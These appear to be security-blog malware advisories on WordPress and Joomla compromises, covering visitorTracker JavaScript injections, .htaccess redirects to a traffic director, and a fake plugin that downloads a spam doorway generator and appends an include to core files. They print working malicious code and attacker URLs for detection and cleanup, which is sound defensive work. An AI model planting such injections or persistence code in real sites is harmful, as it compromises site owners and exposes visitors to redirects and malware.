Category: Uncategorized

Recently, we\'re seeing an increasing visitorTracker malware wave.

Moreover, there are lot of corrupted infections out there, breaking the infected sites. Right now, the malicious code starts and ends with visitorTracker comment tag and lot of site\'s legitimate JavaScript files are injected with the malicious code as well. The outcome - in case of successful (not broken) infection - is spam content served for the visitors using mobile devices.

Part of the malicious injection:

var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
            if(visitorTracker_ isMob ()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{
                if((isIE && !isChrome && !visitorTracker_isMob())){
                    var visitortrackervs = document [.] createElement("script"); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
                } 
            }
        }
        visitortracksdel();
    }

As mentioned, the infection is very buggy and often removed single-quotes from legitimate files which corrupts the site completely. Affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore files from a clean backup.

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, thus multiple identical redirect rules in the same .htaccess file.

If you find this code, remove it right away!

We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com.That\'s the code being added to the hacked sites:

< script type='text/javascript' src="http://gccanada[.]com/jquery[.]js"

What is so bad about it? The final domain \'freeresultsguide.com\', pushes you to buy a fake anti virus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gcanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.

Today we found a few websites that loaded strange code from tag-cloud-generator[.]com.

Sites tried load several image and font files from this site, but they all returned 404 Not Found. The only live file that they loaded was hxxp://www.tag-cloud-generator[.]com/js/fx2.js or it's pseudo-localized copies like hxxp://www.tag-cloud-generator[.]com/NL/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/EN/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/FR/js/fx2.js, etc.

The fx2.js files has an encrypted script that loads (randomly) one of the following scripts:

hxxp://www.tag-cLoud-generator[.]com/b01.js
hxxp://www.tag-cLoud-generator[.]com/b02.js
hxxp://www.tag-cLoud-generator[.]com/b03.js
hxxp://www.tag-cLoud-generator[.]com/b04.js

And those scripts in turn, redirect visitors to one of the following parked domains with ads:

www.rusoen[.]com
www.askinz[.]com
www.ad-u.com
www.kinkyfirehouse[.]com

Using code like this:

JavaScriptRedirectURL="http://www.ad-u[.]com/";window.top.location.href=JavaScriptRedirectURL;

All these domains, including tag-cloud-generator[.]com are registered in China. If you ever used tag-cloud-generator, make sure to remove it from your site. We will share more information if we find anything new.

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php that calls itself WP Social Include File. It downloads doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it into wp-content/mu-plugins/mu-plugin.png and then includes this file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed using a special User Agent

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

1. soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
3. ads.akeemdom.com
4. wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
5. theme.wpcache-blogger.com
6. phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

We are seeing an increasing number of hacked sited with Chinese doorways promoting various fake merchandises (from Louis Vuitton handbags to NFL jerseys and Canada goose jackets).

Those doorways target both Western web searches and the Chinese. Here\'s how they make sure the doorway correctly preserves search queries in Chinese (converting from UTF-8 to gb2312) when they work with Google search referrer string:

if (empty($_SERVER['HTTP_REFERER'])) {
    $HTTP_Referer = "n";
} else {
    $temp = urldecode($_SERVER['HTTP_REFERER']);
    if (strpos($_SERVER['HTTP_REFERER'], 'ie=utf-8') !== false) {
        $temp = mb_convert_encoding($temp, 'gb2312', 'utf-8'); //utf-8->gb2312

    }
    $HTTP_Referer = strtolower($temp);
}

Since Google uses ie=ut-8 by default for most languages, queries using non-ASCII and non-Chinese Simplified characters will be garbled. Apparently the they are only interested in English and Chinese queries.